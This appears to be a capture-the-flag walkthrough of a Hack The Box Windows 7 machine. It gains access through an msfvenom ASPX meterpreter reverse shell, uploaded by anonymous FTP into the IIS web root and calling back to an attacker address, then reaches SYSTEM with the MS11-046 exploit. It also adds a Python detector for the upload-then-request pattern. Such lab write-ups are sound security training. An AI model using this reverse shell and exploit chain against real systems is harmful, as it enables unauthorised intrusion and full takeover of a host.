I first started by running Nmap against the machine.
# Nmap 7.80 scan initiated Tue Sep 15 15:54:13 2020 as: nmap -sV -sC -O -oN scan -p- 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.023s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
| 09-19-20  03:04AM                 2864 shell1.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 15 15:56:25 2020 -- 1 IP address (1 host up) scanned in 132.34 seconds
From this output we can see that FTP and HTTP are both running, with HTTP being served by IIS 7.5. We can also see that the FTP server allows anonymous logins, and that its listing (aspnet_client, iisstart.htm, welcome.png) matches the IIS web root.
I connected to the FTP server and uploaded a txt file, which worked. I was then able to browse to that same file over HTTP, confirming that the FTP directory is the IIS web root. Since uploads into the web root were possible, I generated an ASPX reverse shell with msfvenom to upload to the machine.
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=10.10.14.27 lport=2600 -f aspx -o now.aspx
I then uploaded the now.aspx file to the devel machine:
root@kali:/home/kali/Documents/devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put now.aspx
local: now.aspx remote: now.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2879 bytes sent in 0.00 secs (4.3860 MB/s)
Once the file was uploaded, I started a handler in Metasploit listening on port 2600 to catch the reverse shell created when now.aspx is executed.
msf5 exploit() > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.27
lhost => 10.10.14.27
msf5 exploit(multi/handler) > set lport 2600
lport => 2600
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.27:2600
I then opened a web browser and browsed to http://10.10.10.5/now.aspx, which makes IIS execute the uploaded page and fire the reverse shell. The handler output confirmed that this worked.
[*] Started reverse TCP handler on 10.10.14.27:2600
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 10 opened (10.10.14.27:2600 -> 10.10.10.5:49165) at 2020-09-19 14:05:12 -0400

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > systeminfo
[-] Unknown command: systeminfo.
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter >
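The chain above (an anonymous FTP STOR of a server-side script into the web root, followed by an HTTP request for the same path a short time later) is exactly what a defender running this box would want to alert on. As an added example that is not part of this writeup, the Python below correlates the two events over constructed, simplified W3C-style FTP and HTTP log samples; the column layout, usernames and timestamps are assumptions for illustration, not real IIS logs.

```python
"""Correlate FTP uploads of server-side script files with later HTTP requests
for the same path. Log samples are constructed, simplified W3C-style records
(columns declared by a #Fields line), not real IIS log output."""
from datetime import datetime

# Extensions IIS (or another web server) would execute rather than serve as data.
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

# Constructed sample FTP log: a harmless txt upload, the anonymous .aspx upload,
# and an authenticated deployment that should be reviewed rather than ignored.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-09-19 03:04:10 10.10.14.27 anonymous STOR /test.txt 226
2020-09-19 03:04:40 10.10.14.27 anonymous STOR /now.aspx 226
2020-09-19 03:05:00 10.10.14.30 deploy STOR /release.aspx 226
"""
# Constructed sample HTTP log: each uploaded file is requested afterwards.
HTTP_LOG = """#Fields: date time cs-method cs-uri-stem c-ip sc-status
2020-09-19 03:04:50 GET /test.txt 10.10.14.27 200
2020-09-19 03:06:12 GET /now.aspx 10.10.14.27 200
2020-09-19 03:07:00 GET /release.aspx 10.10.14.30 200
"""

def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def stamp(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")

def find_upload_then_execute(ftp_text, http_text, window_s=3600):
    """Return (ftp_user, path, seconds_until_request) for every successful STOR
    of a script file that is followed within window_s by an HTTP request for
    the same path. Anonymous uploads are the high-severity case."""
    uploads = [r for r in parse_w3c(ftp_text)
               if r["cs-method"] == "STOR" and r["sc-status"].startswith("2")
               and r["cs-uri-stem"].lower().endswith(SCRIPT_EXTS)]
    hits = []
    for up in uploads:
        for req in parse_w3c(http_text):
            delta = (stamp(req) - stamp(up)).total_seconds()
            if req["cs-uri-stem"] == up["cs-uri-stem"] and 0 <= delta <= window_s:
                hits.append((up["cs-username"], up["cs-uri-stem"], int(delta)))
                break
    return hits

if __name__ == "__main__":
    for user, path, secs in find_upload_then_execute(FTP_LOG, HTTP_LOG):
        print(f"{user} uploaded {path}; requested over HTTP {secs}s later")
```

The fix on the server side is the obvious one: disable anonymous authentication on the IIS FTP site, or point the FTP site at a directory that is not the web root.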
From this output we can see it is a Windows 7 32-bit machine. After some trial and error I was able to identify that it had no hotfixes installed, and so decided to use the MS11-046 exploit to escalate privileges. The exploit was downloaded from exploitdb and cross-compiled into an executable that can be run on the devel machine:
root@kali:/home/kali/Downloads# i686-w64-mingw32-gcc 40564.c -o testing.exe -lws2_32
I then uploaded this compiled testing.exe to the devel machine using the meterpreter shell:
meterpreter > upload /home/kali/Documents/devel/testing.exe
[*] uploading  : /home/kali/Documents/devel/testing.exe -> testing.exe
[*] Uploaded 291.76 KiB of 291.76 KiB (100.0%): /home/kali/Documents/devel/testing.exe -> testing.exe
[*] uploaded   : /home/kali/Documents/devel/testing.exe -> testing.exe
meterpreter >
Once uploaded, I dropped into a cmd shell from meterpreter and executed testing.exe:
meterpreter > shell
Process 1196 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\Users\Public>whoami
whoami
iis apppool\web

c:\Users\Public>testing.exe
testing.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>
You can see from this output that the exploit ran successfully and escalated the shell from the IIS application pool identity to NT AUTHORITY\SYSTEM. As SYSTEM we can then read both the user and root flags.
c:\Windows\System32>cd /Users/babis/Desktop
cd /Users/babis/Desktop

c:\Users\babis\Desktop>more user.txt.txt
more user.txt.txt
[REDACTED]

c:\Users\babis\Desktop>cd /users/Administrator/Desktop
cd /users/Administrator/Desktop

c:\Users\Administrator\Desktop>more root.txt.txt
more root.txt.txt
[REDACTED]

c:\Users\Administrator\Desktop>